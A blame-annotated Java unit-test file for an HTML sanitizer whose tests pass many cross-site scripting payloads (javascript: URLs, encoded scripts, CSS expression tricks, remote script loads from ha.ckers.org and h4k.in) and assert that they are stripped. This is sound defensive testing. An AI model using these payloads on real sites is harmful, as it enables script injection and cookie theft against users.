2160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<iframe src=http://ha.ckers.org/scriptlet.html <", "<iframe");
217afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src");
2190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src");
220afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert");
2220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert");
2230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
224afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testImgAttacks() throws Exception {
2260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img");
2270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img");
228afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<img src=javascript:alert(document.cookie)>", "<img");
230afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "<img");
2320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "<img");
233afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041'>", "src");
2350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041'>", "src");
236afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "alert");
2380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "alert");
239afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String s = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>";
2410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (sanitize(s).length() != 0) {
2420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "&amp;");
2430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
2440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    s = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>";
2450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (sanitize(s).length() != 0) {
2460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "&amp;");
2470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
248afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    sanitize("<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>");
2500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    sanitize("<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>");
251afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript");
2530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript");
254afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript");
2560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript");
257afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript");
2590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript");
2600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
261afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testHrefAttacks() throws Exception {
2630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href");
2640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href");
265afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href");
2670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href");
268afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org");
2700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org");
271afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org");
2730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org");
274afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript");
2760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript");
277afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript");
2790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript");
280afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta");
2820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta");
283afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta");
2850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta");
286afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta");
2880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta");
289afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe");
2910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe");
292afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript");
2940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript");
295afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background");
2970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background");
298afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background");
3000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background");
301afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript");
3030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript");
304afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert");
3060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert");
307afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert");
3090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert");
310afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert");
3120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert");
313afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript");
3150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript");
316afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base");
3180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base");
319afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object");
3210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object");
322afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript");
324afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript");
326afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
3280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
329afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
3310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
332afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
335afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
338afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
341afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
344afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script");
3460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script");
347afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script");
3490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script");
350afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>", "style");
3520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>", "style");
353afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe");
3550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe");
356afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript");
3580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript");
359afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document");
3610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document");
3620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
363afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
3650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test CSS protections.
3660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
367afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testCssAttacks() throws Exception {
369afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position");
3710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position");
372afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position");
3740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position");
375afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index");
3770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index");
378afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index");
3800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index");
3810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
382afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
3840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test a bunch of strings that have tweaked the XML parsing capabilities of
3850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * NekoHTML.
3860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
3870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testIllegalXML() throws Exception {
3880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    for (int i = 0; i < BASE64_BAD_XML_STRINGS.length; i++) {
389489a0ec7301a86af8497d24748336db09ca278damikesamuel      String testStr = new String(
390489a0ec7301a86af8497d24748336db09ca278damikesamuel          Base64.decodeBase64(BASE64_BAD_XML_STRINGS[i]),
391489a0ec7301a86af8497d24748336db09ca278damikesamuel          "UTF-8");
3924e867904c8295537803c1c8a076e130df5674b58mikesamuel      sanitize(testStr);
3934e867904c8295537803c1c8a076e130df5674b58mikesamuel      sanitize(testStr);
3940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
395afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // These fail in AntiSamy due to a bug in NekoHTML
3970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
3980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href=\"http://www.test.com\" rel=\"nofollow\"></a>",
3990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize("<a . href=\"http://www.test.com\">"));
4000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
4010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href=\"http://www.test.com\" rel=\"nofollow\"></a>",
4020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize("<a - href=\"http://www.test.com\">"));
403afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertTrue(sanitize("<style>") != null);
4050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
406afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testPreviousBugs() throws Exception {
408afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /*
4100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * issues 12 (and 36, which was similar). empty tags cause display
4110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * problems/"formjacking"
4120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
413afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      Pattern p = Pattern.compile(".*<strong(\\s*)/>.*", Pattern.DOTALL);
4160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s1 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>");
4170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s2 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>");
418afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
420afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
